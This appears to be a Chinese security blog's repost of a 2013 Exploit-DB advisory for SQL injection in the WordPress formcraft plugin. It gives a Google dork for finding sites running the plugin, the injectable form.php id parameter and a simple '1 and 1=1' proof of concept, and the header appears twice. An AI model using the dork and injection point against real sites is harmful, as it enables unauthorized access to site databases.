WordPress formcraft插件注入

  • A+
所属分类:漏洞时代
摘要

#######################################################################
# Exploit Title : Wordpress formcraft Plugin Sql Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/formcraft
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Location1:
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################

#######################################################################
# Exploit Title : WordPress formcraft Plugin Sql Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/formcraft
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Location1:
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################

##############
Milad Hacking

We Love Mohammad
##############

References:

http://xforce.iss.net/xforce/xfdb/89581
http://www.securityfocus.com/bid/64183
http://www.exploit-db.com/exploits/30002
http://secunia.com/advisories/56044
http://packetstormsecurity.com/files/124343/wpformcraft-sql.txt

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: